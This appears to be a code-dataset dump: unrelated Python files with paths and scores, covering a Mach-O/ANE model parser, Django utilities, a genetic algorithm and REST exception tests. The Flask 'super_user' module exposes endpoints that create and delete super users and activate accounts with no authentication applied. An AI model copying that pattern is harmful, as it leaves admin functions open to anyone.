a = presc[0]
dat = self[exp0]
ground_energy_map = dat.mass_to_ground_energy_map(nshell=nshell)
if a in ground_energy_map:
ground_energy = ground_energy_map[a]
aeff_eq_a_to_ground_energy[a] = ground_energy
else:
continue
return aeff_eq_a_to_ground_energy | 0.491944 | 0.388821 |
from hexdump import hexdump
from macholib import MachO
def get_macho(fn):
# mod to make the header okay
# MH_CIGAM_64 is good
dat = open(fn, "rb").read()
dat = b"\xcf\xfa\xed\xfe"+dat[4:]
from tempfile import NamedTemporaryFile
with NamedTemporaryFile(delete=False) as f:
f.write(dat)
f.close()
return MachO.MachO(f.name)
a = get_macho("model.hwx")
# load commands
for c in a.headers[0].commands:
print(c[0])
if c[0].cmd == 25:
print(c[1])
for section in c[2]:
print(section.segname.strip(b'\0'), section.sectname.strip(b'\0'), hex(section.addr), hex(section.size), "@", hex(c[1].fileoff))
#print(dir(section))
if c[1].filesize > 0:
hexdump(section.section_data)
# this parser is wrong (fixed with 64-bit one)
from macholib import SymbolTable
sym = SymbolTable.SymbolTable(a)
syms = {}
for l in sym.nlists:
print(l)
if l[0].n_value != 0:
syms[l[1]] = l[0].n_value
for k,v in syms.items():
print(k, hex(v))
from termcolor import colored
def compare(x, y):
ss = []
ln = []
ln2 = []
ll = (max(len(x), len(y)) + 0xF)//0x10 * 0x10
highlight = False
next_highlight = 0x2b
for i in range(ll+1):
if i == next_highlight:
highlight = True
if i < len(y):
next_highlight += y[i]+8
else:
next_highlight = None
else:
highlight = False
a = "%02X" % x[i] if i < len(x) else "--", \
"%02X" % y[i] if i < len(y) else "--"
def fj(x):
ss = []
for i in range(0, 0x10, 4):
ss.append(' '.join(x[i:i+4]))
return ' '.join(ss)
if i!=0 and i%0x10 == 0:
ss.append("%8X: " % (i-0x10)+fj(ln)+" | "+fj(ln2)+"\n")
ln = []
ln2 = []
if a[0] != a[1] and a[0] != "--" and a[1] != "--":
ln.append(colored(a[0], 'green'))
ln2.append(colored(a[1], 'red'))
else:
if highlight:
ln.append(colored(a[0], 'yellow'))
ln2.append(colored(a[1], 'yellow'))
else:
ln.append(a[0])
ln2.append(a[1])
return ''.join(ss)
g = get_macho("model.hwx.golden")
f1 = g.headers[0].commands[1][2][0].section_data
f2 = a.headers[0].commands[1][2][0].section_data
for i in range(0, len(f2), 0x300):
print("===== op %d =====" % (i//0x300))
if len(f1) < 0x300:
print(compare(f1, f2[i:i+0x300]))
else:
print(compare(f1[i:i+0x300], f2[i:i+0x300]))
#open("/tmp/data.section", "wb").write(f2)
#print(compare(open("model.hwx.golden", "rb").read(), open("model.hwx", "rb").read())) | ane/2_compile/hwx_parse.py |
from hexdump import hexdump
from macholib import MachO
def get_macho(fn):
# mod to make the header okay
# MH_CIGAM_64 is good
dat = open(fn, "rb").read()
dat = b"\xcf\xfa\xed\xfe"+dat[4:]
from tempfile import NamedTemporaryFile
with NamedTemporaryFile(delete=False) as f:
f.write(dat)
f.close()
return MachO.MachO(f.name)
a = get_macho("model.hwx")
# load commands
for c in a.headers[0].commands:
print(c[0])
if c[0].cmd == 25:
print(c[1])
for section in c[2]:
print(section.segname.strip(b'\0'), section.sectname.strip(b'\0'), hex(section.addr), hex(section.size), "@", hex(c[1].fileoff))
#print(dir(section))
if c[1].filesize > 0:
hexdump(section.section_data)
# this parser is wrong (fixed with 64-bit one)
from macholib import SymbolTable
sym = SymbolTable.SymbolTable(a)
syms = {}
for l in sym.nlists:
print(l)
if l[0].n_value != 0:
syms[l[1]] = l[0].n_value
for k,v in syms.items():
print(k, hex(v))
from termcolor import colored
def compare(x, y):
ss = []
ln = []
ln2 = []
ll = (max(len(x), len(y)) + 0xF)//0x10 * 0x10
highlight = False
next_highlight = 0x2b
for i in range(ll+1):
if i == next_highlight:
highlight = True
if i < len(y):
next_highlight += y[i]+8
else:
next_highlight = None
else:
highlight = False
a = "%02X" % x[i] if i < len(x) else "--", \
"%02X" % y[i] if i < len(y) else "--"
def fj(x):
ss = []
for i in range(0, 0x10, 4):
ss.append(' '.join(x[i:i+4]))
return ' '.join(ss)
if i!=0 and i%0x10 == 0:
ss.append("%8X: " % (i-0x10)+fj(ln)+" | "+fj(ln2)+"\n")
ln = []
ln2 = []
if a[0] != a[1] and a[0] != "--" and a[1] != "--":
ln.append(colored(a[0], 'green'))
ln2.append(colored(a[1], 'red'))
else:
if highlight:
ln.append(colored(a[0], 'yellow'))
ln2.append(colored(a[1], 'yellow'))
else:
ln.append(a[0])
ln2.append(a[1])
return ''.join(ss)
g = get_macho("model.hwx.golden")
f1 = g.headers[0].commands[1][2][0].section_data
f2 = a.headers[0].commands[1][2][0].section_data
for i in range(0, len(f2), 0x300):
print("===== op %d =====" % (i//0x300))
if len(f1) < 0x300:
print(compare(f1, f2[i:i+0x300]))
else:
print(compare(f1[i:i+0x300], f2[i:i+0x300]))
#open("/tmp/data.section", "wb").write(f2)
#print(compare(open("model.hwx.golden", "rb").read(), open("model.hwx", "rb").read())) | 0.083287 | 0.217379 |
import logging
import os
import sys
import csv
import codecs
from io import BytesIO
from django_extensions.management.signals import post_command, pre_command
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
def setup_logger(logger, stream, filename=None, fmt=None):
"""Sets up a logger (if no handlers exist) for console output,
and file 'tee' output if desired."""
if len(logger.handlers) < 1:
console = logging.StreamHandler(stream)
console.setLevel(logging.DEBUG)
console.setFormatter(logging.Formatter(fmt))
logger.addHandler(console)
logger.setLevel(logging.DEBUG)
if filename:
outfile = logging.FileHandler(filename)
outfile.setLevel(logging.INFO)
outfile.setFormatter(logging.Formatter("%(asctime)s " + (fmt if fmt else '%(message)s')))
logger.addHandler(outfile)
class RedirectHandler(logging.Handler):
"""Redirect logging sent to one logger (name) to another."""
def __init__(self, name, level=logging.DEBUG):
# Contemplate feasibility of copying a destination (allow original handler) and redirecting.
logging.Handler.__init__(self, level)
self.name = name
self.logger = logging.getLogger(name)
def emit(self, record):
self.logger.handle(record)
def signalcommand(func):
"""A decorator for management command handle defs that sends out a pre/post signal."""
def inner(self, *args, **kwargs):
pre_command.send(self.__class__, args=args, kwargs=kwargs)
ret = func(self, *args, **kwargs)
post_command.send(self.__class__, args=args, kwargs=kwargs, outcome=ret)
return ret
return inner
def has_ipdb():
try:
import ipdb # noqa
import IPython # noqa
return True
except ImportError:
return False
class UnicodeWriter:
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
self.queue = BytesIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
self.writer.writerow([s.encode("utf-8") for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row) | desktop/core/ext-py/django-extensions-1.8.0/django_extensions/management/utils.py | import logging
import os
import sys
import csv
import codecs
from io import BytesIO
from django_extensions.management.signals import post_command, pre_command
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
def setup_logger(logger, stream, filename=None, fmt=None):
"""Sets up a logger (if no handlers exist) for console output,
and file 'tee' output if desired."""
if len(logger.handlers) < 1:
console = logging.StreamHandler(stream)
console.setLevel(logging.DEBUG)
console.setFormatter(logging.Formatter(fmt))
logger.addHandler(console)
logger.setLevel(logging.DEBUG)
if filename:
outfile = logging.FileHandler(filename)
outfile.setLevel(logging.INFO)
outfile.setFormatter(logging.Formatter("%(asctime)s " + (fmt if fmt else '%(message)s')))
logger.addHandler(outfile)
class RedirectHandler(logging.Handler):
"""Redirect logging sent to one logger (name) to another."""
def __init__(self, name, level=logging.DEBUG):
# Contemplate feasibility of copying a destination (allow original handler) and redirecting.
logging.Handler.__init__(self, level)
self.name = name
self.logger = logging.getLogger(name)
def emit(self, record):
self.logger.handle(record)
def signalcommand(func):
"""A decorator for management command handle defs that sends out a pre/post signal."""
def inner(self, *args, **kwargs):
pre_command.send(self.__class__, args=args, kwargs=kwargs)
ret = func(self, *args, **kwargs)
post_command.send(self.__class__, args=args, kwargs=kwargs, outcome=ret)
return ret
return inner
def has_ipdb():
try:
import ipdb # noqa
import IPython # noqa
return True
except ImportError:
return False
class UnicodeWriter:
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
self.queue = BytesIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
self.writer.writerow([s.encode("utf-8") for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row) | 0.427277 | 0.078536 |
from flask_restplus import Resource, Namespace
from app.v1.extensions.auth.jwt_auth import auth
from app.v1.extensions.auth import role_required
from flask import request
from app import db
from app.v1.utils.super_user_utils import save_super_user,update_super_user,delete_super_user,new_registors,data_ActivateNewRegisters,data_RejectNewRegisters
from .serial import super_user_reg_model_list,update_super_user_update,update_model,super_user_delete,new_registors_data
super_user_ns = Namespace('super_user')
parser = super_user_ns.parser()
parser.add_argument('Authorization',
type=str,
required=False,
location='headers',
help='Bearer Access Token')
@super_user_ns.route('/super_user_create')
class super_create(Resource):
@super_user_ns.expect(super_user_reg_model_list, validate=True)
def post(self):
data = request.json
print(data)
return save_super_user(data=data)
@super_user_ns.route('/super_user_delete')
class super_user_delete(Resource):
@super_user_ns.expect(super_user_delete, validate=True)
def delete(self):
data = request.json
return delete_super_user(data=data)
@super_user_ns.route('/super_user_update')
class super_user_update(Resource):
@super_user_ns.expect(update_super_user_update, validate=True)
def put(self):
data = request.json
return update_super_user(data=data)
@super_user_ns.route('/NewRegistrationData')
class NewRegistrationData(Resource):
@super_user_ns.marshal_list_with(new_registors_data,envelope='data')
def get(self):
return new_registors()
@super_user_ns.route('/ActivateNewRegisters/<id>')
class ActivateNewRegisters(Resource):
def get(self,id):
return data_ActivateNewRegisters(id)
@super_user_ns.route('/RejectNewRegisters/<id>')
class RejectNewRegisters(Resource):
def get(self,id):
return data_RejectNewRegisters(id) | app/v1/modules/super_user/resources.py | from flask_restplus import Resource, Namespace
from app.v1.extensions.auth.jwt_auth import auth
from app.v1.extensions.auth import role_required
from flask import request
from app import db
from app.v1.utils.super_user_utils import save_super_user,update_super_user,delete_super_user,new_registors,data_ActivateNewRegisters,data_RejectNewRegisters
from .serial import super_user_reg_model_list,update_super_user_update,update_model,super_user_delete,new_registors_data
super_user_ns = Namespace('super_user')
parser = super_user_ns.parser()
parser.add_argument('Authorization',
type=str,
required=False,
location='headers',
help='Bearer Access Token')
@super_user_ns.route('/super_user_create')
class super_create(Resource):
@super_user_ns.expect(super_user_reg_model_list, validate=True)
def post(self):
data = request.json
print(data)
return save_super_user(data=data)
@super_user_ns.route('/super_user_delete')
class super_user_delete(Resource):
@super_user_ns.expect(super_user_delete, validate=True)
def delete(self):
data = request.json
return delete_super_user(data=data)
@super_user_ns.route('/super_user_update')
class super_user_update(Resource):
@super_user_ns.expect(update_super_user_update, validate=True)
def put(self):
data = request.json
return update_super_user(data=data)
@super_user_ns.route('/NewRegistrationData')
class NewRegistrationData(Resource):
@super_user_ns.marshal_list_with(new_registors_data,envelope='data')
def get(self):
return new_registors()
@super_user_ns.route('/ActivateNewRegisters/<id>')
class ActivateNewRegisters(Resource):
def get(self,id):
return data_ActivateNewRegisters(id)
@super_user_ns.route('/RejectNewRegisters/<id>')
class RejectNewRegisters(Resource):
def get(self,id):
return data_RejectNewRegisters(id) | 0.318485 | 0.096068 |
from collections import defaultdict
import random
from typing import List, Tuple, Set, DefaultDict
from math import ceil
from instance import Instance
MAX_ITERATIONS = 2000
BEST_POSSIBLE_FITNESS = 1
Solution = DefaultDict[int, Set[Tuple[int, int]]]
EvaluatedSolution = Tuple[Solution, int, float]
Population = List[Solution]
EvaluatedPopulation = List[EvaluatedSolution]
class GeneticAlgorithm:
'''Genetic Algorithm to solve the MLST problem.
After instantiating, just call the run() method.
Args:
instance: MLST instance to be solved.
seed: RNG seed.
population_size: Number of simultaneous solutions.
mutation_rate: Probability of a solution mutate.
elitism_rate: Percentage of best solutions to be preserved across iterations.
'''
def __init__(self, instance: Instance, seed: int, population_size: int, mutation_rate: float, elitism_rate: float):
self._instance = instance
self._population_size = population_size
self._mutation_rate = mutation_rate
self._elitism_rate = elitism_rate
random.seed(seed)
def run(self) -> Tuple[EvaluatedSolution, EvaluatedSolution]:
'''Runs the algorithm until reaching a stop criteria.
Returns:
Tuple with first solution and last solution (in this order).
'''
elite_size = ceil(self._elitism_rate*self._population_size)
new_solutions_size = self._population_size - elite_size
population = self._generate_initial_population()
should_stop = False
i = 1
first_solution = None
best_solution = None
while not should_stop:
print(f'iteration {i}')
evaluated_pop = self._evaluate_population(population)
elite = self._elitism_operator(evaluated_pop, elite_size)
if i == 1:
first_solution = evaluated_pop[0]
if not best_solution or best_solution[1] > evaluated_pop[0][1]:
best_solution = evaluated_pop[0]
new_solutions = self._crossover_operator(evaluated_pop, new_solutions_size)
population = elite + self._mutation_operator(new_solutions)
should_stop = self._stopping_criterion(best_solution, i)
i += 1
return (first_solution, best_solution)
def _generate_initial_population(self) -> Population:
''' Generates the initial solutions.
Each spanning tree is created by recording the selected edges during a DFS on the whole graph.
Each DFS runs with a random root.
Returns:
List with initial candidate solutions.
'''
population = []
roots = random.choices(self._instance.nodes, k=self._population_size)
for root in roots:
population.append(self._dfs_tree(root))
return population
def _dfs_tree(self, root: int, solution: Solution = None) -> Solution:
'''Generates a spanning tree through DFS.
Args:
root: Initial spanning tree node.
solution: Graph to be traversed. Defaults to None.
If its value is falsy (like the `None` default), then `self._instance.adjacency_list` is used.
Returns:
Spanning tree.
'''
if not solution:
solution = self._instance.adjacency_list
return self._dfs_tree_internal(root, {root, }, defaultdict(set), solution)
def _dfs_tree_internal(self, root: int, expanded_nodes: Set[int], new_solution: Solution, solution: Solution) -> Solution:
'''Generates a spanning tree through DFS.
This method must not be used directly. Use the wrapper `self._dfs_tree` instead.
Args:
root: Initial spanning tree node.
expanded_nodes: Nodes already visited.
new_solution: Solution being calculated.
solution: Graph being traversed.
Returns:
Spanning tree.
'''
neighbors = list(solution[root])
random.shuffle(neighbors)
for neighbor, label in neighbors:
if neighbor not in expanded_nodes:
expanded_nodes.add(neighbor)
new_solution[root].add((neighbor, label))
new_solution[neighbor].add((root, label))
self._dfs_tree_internal(neighbor, expanded_nodes, new_solution, solution)
return new_solution
def _evaluate_population(self, population: Population) -> EvaluatedPopulation:
'''Computes the absolute and relative fitness for each solution.
Args:
population: Solutions whose fitness will be calculated.
Returns:
A list of tuples with a solution as the first component, the absolute fitness as second
and the relative fitness as third. The result is sorted by absolute fitness,
in ascending order.
'''
result = []
for solution in population:
labels = set()
for edges_list in solution.values():
for _, label in edges_list:
labels.add(label)
fitness = len(labels)
result.append((solution, fitness))
fitness_sum = sum([fitness for _, fitness in result])
result = [(solution, fitness, fitness/fitness_sum) for solution, fitness in result]
sorted_result = sorted(result, key=lambda x: x[1])
return sorted_result
def _elitism_operator(self, population: EvaluatedPopulation, elite_size: int) -> Population:
'''Generates a list with the best solutions.
Args:
population (List[Tuple[List[Edge], int, float]]): Popolation already evaluated and sorted.
elite_size (int): Number of best solutions to be selected.
Returns:
List of `elite_size` best solutions.
'''
return [solution for solution, _, _ in population[0:elite_size]]
def _crossover_operator(self, population: EvaluatedPopulation, new_solutions_size: int) -> Population:
'''Produces a new population applying crossover in the current population.
This method implements the `roulette method`.
Two solutions are combined by merging its edges and applying DFS from a random root.
Args:
population: Current population already evaluated.
new_solutions_size: Size of new population.
Returns:
New population.
'''
new_solutions = []
probs = [relative_fitness for _, _, relative_fitness in population]
for i in range(new_solutions_size):
father_1, father_2 = [solution for solution, _, _ in random.choices(population, weights=probs, k=2)]
child = defaultdict(Set)
for node in self._instance.nodes:
child[node] = father_1[node].union(father_2[node])
root = random.choice(self._instance.nodes)
new_solutions.append(self._dfs_tree(root, child))
return new_solutions
def _mutation_operator(self, population: Population) -> Population:
'''Applies random mutations in population.
Each solution will be mutated with probability `self._mutation_rate`.
The mutation is doing by selecting a random node as root and setting its neigbors as all neighbors from the problem instance.
Lastly, we apply DFS in this solution, starting from selected root.
Args:
population: Population to be mutated.
Returns:
New population.
'''
new_solutions =[]
for solution in population:
should_mutate = random.choices([True, False], weights=[self._mutation_rate, 1-self._mutation_rate])[0]
# 'in' operator is EXTREMELY FASTER with sets. 55s with lists, 16s with sets.
if should_mutate:
root = random.choice(self._instance.nodes)
solution[root] = self._instance.adjacency_list[root]
for neighbor, label in solution[root]:
solution[neighbor].add((root, label))
new_solutions.append(self._dfs_tree(root, solution))
else:
new_solutions.append(solution)
return new_solutions
def _stopping_criterion(self, best_solution: EvaluatedSolution, iteration: int) -> bool:
'''Decides if must stop the algorithm.
Args:
best_solution: Best solution found in the last iteration, already evaluated.
iteration: Number of executed iterations.
Returns:
True if the algorithm must stop. False otherwise.
'''
return best_solution[1] == BEST_POSSIBLE_FITNESS or \
iteration == MAX_ITERATIONS | genetic-algorithm/genetic_algorithm.py | from collections import defaultdict
import random
from typing import List, Tuple, Set, DefaultDict
from math import ceil
from instance import Instance
MAX_ITERATIONS = 2000
BEST_POSSIBLE_FITNESS = 1
Solution = DefaultDict[int, Set[Tuple[int, int]]]
EvaluatedSolution = Tuple[Solution, int, float]
Population = List[Solution]
EvaluatedPopulation = List[EvaluatedSolution]
class GeneticAlgorithm:
'''Genetic Algorithm to solve the MLST problem.
After instantiating, just call the run() method.
Args:
instance: MLST instance to be solved.
seed: RNG seed.
population_size: Number of simultaneous solutions.
mutation_rate: Probability of a solution mutate.
elitism_rate: Percentage of best solutions to be preserved across iterations.
'''
def __init__(self, instance: Instance, seed: int, population_size: int, mutation_rate: float, elitism_rate: float):
self._instance = instance
self._population_size = population_size
self._mutation_rate = mutation_rate
self._elitism_rate = elitism_rate
random.seed(seed)
def run(self) -> Tuple[EvaluatedSolution, EvaluatedSolution]:
'''Runs the algorithm until reaching a stop criteria.
Returns:
Tuple with first solution and last solution (in this order).
'''
elite_size = ceil(self._elitism_rate*self._population_size)
new_solutions_size = self._population_size - elite_size
population = self._generate_initial_population()
should_stop = False
i = 1
first_solution = None
best_solution = None
while not should_stop:
print(f'iteration {i}')
evaluated_pop = self._evaluate_population(population)
elite = self._elitism_operator(evaluated_pop, elite_size)
if i == 1:
first_solution = evaluated_pop[0]
if not best_solution or best_solution[1] > evaluated_pop[0][1]:
best_solution = evaluated_pop[0]
new_solutions = self._crossover_operator(evaluated_pop, new_solutions_size)
population = elite + self._mutation_operator(new_solutions)
should_stop = self._stopping_criterion(best_solution, i)
i += 1
return (first_solution, best_solution)
def _generate_initial_population(self) -> Population:
''' Generates the initial solutions.
Each spanning tree is created by recording the selected edges during a DFS on the whole graph.
Each DFS runs with a random root.
Returns:
List with initial candidate solutions.
'''
population = []
roots = random.choices(self._instance.nodes, k=self._population_size)
for root in roots:
population.append(self._dfs_tree(root))
return population
def _dfs_tree(self, root: int, solution: Solution = None) -> Solution:
'''Generates a spanning tree through DFS.
Args:
root: Initial spanning tree node.
solution: Graph to be traversed. Defaults to None.
If its value is falsy (like the `None` default), then `self._instance.adjacency_list` is used.
Returns:
Spanning tree.
'''
if not solution:
solution = self._instance.adjacency_list
return self._dfs_tree_internal(root, {root, }, defaultdict(set), solution)
def _dfs_tree_internal(self, root: int, expanded_nodes: Set[int], new_solution: Solution, solution: Solution) -> Solution:
'''Generates a spanning tree through DFS.
This method must not be used directly. Use the wrapper `self._dfs_tree` instead.
Args:
root: Initial spanning tree node.
expanded_nodes: Nodes already visited.
new_solution: Solution being calculated.
solution: Graph being traversed.
Returns:
Spanning tree.
'''
neighbors = list(solution[root])
random.shuffle(neighbors)
for neighbor, label in neighbors:
if neighbor not in expanded_nodes:
expanded_nodes.add(neighbor)
new_solution[root].add((neighbor, label))
new_solution[neighbor].add((root, label))
self._dfs_tree_internal(neighbor, expanded_nodes, new_solution, solution)
return new_solution
def _evaluate_population(self, population: Population) -> EvaluatedPopulation:
'''Computes the absolute and relative fitness for each solution.
Args:
population: Solutions whose fitness will be calculated.
Returns:
A list of tuples with a solution as the first component, the absolute fitness as second
and the relative fitness as third. The result is sorted by absolute fitness,
in ascending order.
'''
result = []
for solution in population:
labels = set()
for edges_list in solution.values():
for _, label in edges_list:
labels.add(label)
fitness = len(labels)
result.append((solution, fitness))
fitness_sum = sum([fitness for _, fitness in result])
result = [(solution, fitness, fitness/fitness_sum) for solution, fitness in result]
sorted_result = sorted(result, key=lambda x: x[1])
return sorted_result
def _elitism_operator(self, population: EvaluatedPopulation, elite_size: int) -> Population:
'''Generates a list with the best solutions.
Args:
population (List[Tuple[List[Edge], int, float]]): Popolation already evaluated and sorted.
elite_size (int): Number of best solutions to be selected.
Returns:
List of `elite_size` best solutions.
'''
return [solution for solution, _, _ in population[0:elite_size]]
def _crossover_operator(self, population: EvaluatedPopulation, new_solutions_size: int) -> Population:
'''Produces a new population applying crossover in the current population.
This method implements the `roulette method`.
Two solutions are combined by merging its edges and applying DFS from a random root.
Args:
population: Current population already evaluated.
new_solutions_size: Size of new population.
Returns:
New population.
'''
new_solutions = []
probs = [relative_fitness for _, _, relative_fitness in population]
for i in range(new_solutions_size):
father_1, father_2 = [solution for solution, _, _ in random.choices(population, weights=probs, k=2)]
child = defaultdict(Set)
for node in self._instance.nodes:
child[node] = father_1[node].union(father_2[node])
root = random.choice(self._instance.nodes)
new_solutions.append(self._dfs_tree(root, child))
return new_solutions
def _mutation_operator(self, population: Population) -> Population:
'''Applies random mutations in population.
Each solution will be mutated with probability `self._mutation_rate`.
The mutation is doing by selecting a random node as root and setting its neigbors as all neighbors from the problem instance.
Lastly, we apply DFS in this solution, starting from selected root.
Args:
population: Population to be mutated.
Returns:
New population.
'''
new_solutions =[]
for solution in population:
should_mutate = random.choices([True, False], weights=[self._mutation_rate, 1-self._mutation_rate])[0]
# 'in' operator is EXTREMELY FASTER with sets. 55s with lists, 16s with sets.
if should_mutate:
root = random.choice(self._instance.nodes)
solution[root] = self._instance.adjacency_list[root]
for neighbor, label in solution[root]:
solution[neighbor].add((root, label))
new_solutions.append(self._dfs_tree(root, solution))
else:
new_solutions.append(solution)
return new_solutions
def _stopping_criterion(self, best_solution: EvaluatedSolution, iteration: int) -> bool:
'''Decides if must stop the algorithm.
Args:
best_solution: Best solution found in the last iteration, already evaluated.
iteration: Number of executed iterations.
Returns:
True if the algorithm must stop. False otherwise.
'''
return best_solution[1] == BEST_POSSIBLE_FITNESS or \
iteration == MAX_ITERATIONS | 0.937633 | 0.513242 |
from WMCore.WebTools.RESTModel import RESTModel, restexpose
from cherrypy import HTTPError
import unittest, logging, json
from WMQuality.WebTools.RESTServerSetup import cherrypySetup, DefaultConfig
from WMQuality.WebTools.RESTClientAPI import makeRequest, methodTest
class REST_Exceptions_t(RESTModel):
def __init__(self, config):
'''
Initialise the RESTModel and add some methods to it.
'''
RESTModel.__init__(self, config)
self.methods['GET'] = {}
self.methods['GET']['generic_exception'] = {'args': [],
'call': self.generic_exception,
'version': 1}
self._addMethod('GET', 'specific_400_exception', self.specific_400_exception)
self._addMethod('GET', 'specific_500_exception', self.specific_500_exception)
self._addMethod('GET', 'specific_404_exception', self.specific_404_exception)
self._addMethod('GET', 'not_serialisable', self.not_serialisable)
@restexpose
def generic_exception(self):
"""
Raise an exception - this will result in a 500 Server Error from the RESTAPI
"""
assert 1 == 2, "1 does not equal 2"
def specific_400_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(400, 'I threw a 400')
def specific_500_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(500, 'I threw a 500')
def specific_404_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(404, 'I threw a 404')
def not_serialisable(self):
"""
Raise an exception in the formatter (complex numbers aren't json serialisable
by default), this is caught and turned into a 500 Server Error by the RESTAPI
"""
return complex(1,2)
test_config = DefaultConfig('WMCore_t.WebTools_t.REST_Exceptions_t')
test_config.Webtools.access_log_level = logging.WARNING
test_config.Webtools.error_log_level = logging.WARNING
from WMQuality.WebTools.RESTBaseUnitTest import RESTBaseUnitTest
# Disabling tests because the decorator doesn't work right
class RESTTestFAIL():
def setUp(self):
self.config = test_config
self.dasFlag = False
self.urlbase = self.config.getServerUrl()
def tearDown(self):
self.dasFlag = None
self.urlbase = None
@cherrypySetup(test_config)
def testGenericException(self):
"""
Method will raise an AssertionError and return 500
"""
url = self.urlbase + 'generic_exception'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "Server Error", 'got: %s' % json.loads(response)['message']
assert json.loads(response)['type'] == "AssertionError", 'got: %s' % json.loads(response)['type']
@cherrypySetup(test_config)
def testSpecific400Exception(self):
"""
Method will raise an HTTPError and return 400
"""
url = self.urlbase + 'specific_400_exception'
response, expires = methodTest('GET', url, output={'code':400})
assert json.loads(response)['message'] == "I threw a 400", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testSpecific404Exception(self):
"""
Method will raise an HTTPError and return 404
"""
url = self.urlbase + 'specific_404_exception'
response, expires = methodTest('GET', url, output={'code':404})
assert json.loads(response)['message'] == "I threw a 404", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testSpecific500Exception(self):
"""
Method will raise an HTTPError and return 500
"""
url = self.urlbase + 'specific_500_exception'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "I threw a 500", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testNotSerialisableException(self):
"""
Method will raise an EncodeError and return 500
"""
url = self.urlbase + 'not_serialisable'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "Server Error", 'got: %s' % json.loads(response)['message']
assert json.loads(response)['type'] == "TypeError", 'got: %s' % json.loads(response)['type']
if __name__ == "__main__":
unittest.main() | test/python/WMCore_t/WebTools_t/REST_Exceptions_t.py | from WMCore.WebTools.RESTModel import RESTModel, restexpose
from cherrypy import HTTPError
import unittest, logging, json
from WMQuality.WebTools.RESTServerSetup import cherrypySetup, DefaultConfig
from WMQuality.WebTools.RESTClientAPI import makeRequest, methodTest
class REST_Exceptions_t(RESTModel):
def __init__(self, config):
'''
Initialise the RESTModel and add some methods to it.
'''
RESTModel.__init__(self, config)
self.methods['GET'] = {}
self.methods['GET']['generic_exception'] = {'args': [],
'call': self.generic_exception,
'version': 1}
self._addMethod('GET', 'specific_400_exception', self.specific_400_exception)
self._addMethod('GET', 'specific_500_exception', self.specific_500_exception)
self._addMethod('GET', 'specific_404_exception', self.specific_404_exception)
self._addMethod('GET', 'not_serialisable', self.not_serialisable)
@restexpose
def generic_exception(self):
"""
Raise an exception - this will result in a 500 Server Error from the RESTAPI
"""
assert 1 == 2, "1 does not equal 2"
def specific_400_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(400, 'I threw a 400')
def specific_500_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(500, 'I threw a 500')
def specific_404_exception(self):
"""
Raise an HTTP Error, this will be preserved and propagated to the client
"""
raise HTTPError(404, 'I threw a 404')
def not_serialisable(self):
"""
Raise an exception in the formatter (complex numbers aren't json serialisable
by default), this is caught and turned into a 500 Server Error by the RESTAPI
"""
return complex(1,2)
test_config = DefaultConfig('WMCore_t.WebTools_t.REST_Exceptions_t')
test_config.Webtools.access_log_level = logging.WARNING
test_config.Webtools.error_log_level = logging.WARNING
from WMQuality.WebTools.RESTBaseUnitTest import RESTBaseUnitTest
# Disabling tests because the decorator doesn't work right
class RESTTestFAIL():
def setUp(self):
self.config = test_config
self.dasFlag = False
self.urlbase = self.config.getServerUrl()
def tearDown(self):
self.dasFlag = None
self.urlbase = None
@cherrypySetup(test_config)
def testGenericException(self):
"""
Method will raise an AssertionError and return 500
"""
url = self.urlbase + 'generic_exception'
response, expires = methodTest('GET', url, output={'code':500})
assert json.loads(response)['message'] == "Server Error", 'got: %s' % json.loads(response)['message']
assert json.loads(response)['type'] == "AssertionError", 'got: %s' % json.loads(response)['type']
@cherrypySetup(test_config)
def testSpecific400Exception(self):
"""
Method will raise an HTTPError and return 400
"""
url = self.urlbase + 'specific_400_exception'
response, expires = methodTest('GET', url, output={'code':400})
assert json.loads(response)['message'] == "I threw a 400", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testSpecific404Exception(self):
"""
Method will raise an HTTPError and return 404
"""
url = self.urlbase + 'specific_404_exception'
response, expires = methodTest('GET', url, output={'code':404})
assert json.loads(response)['message'] == "I threw a 404", 'got: %s' % json.loads(response)['message']
@cherrypySetup(test_config)
def testSpecific500Exception(self):
"""
Method will raise an HTTPError and return 500
"""
